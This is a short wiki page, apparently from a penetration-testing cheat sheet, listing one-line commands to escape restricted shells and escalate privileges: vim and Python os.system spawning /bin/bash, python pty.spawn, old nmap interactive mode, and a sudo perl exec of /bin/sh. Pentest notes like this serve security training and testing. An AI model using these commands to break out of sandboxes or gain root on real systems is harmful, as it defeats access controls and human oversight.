Skip to content

Escape restricted shell

lethanhtung01011980 edited this page Apr 21, 2020 · 12 revisions

Goals

Run vrim and excapse to shell

Or

  • :py import os
  • :py os.system("/bin/bash")

If in limited bash shell

  • python -c "import pty; pty.spawn('/bin/bash')"

Run old nmap in interactive mode

  • nmap --interactive image

Vim basic

Run shell from Perl

  • sudo /usr/bin/perl -e 'exec "/bin/sh";'

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally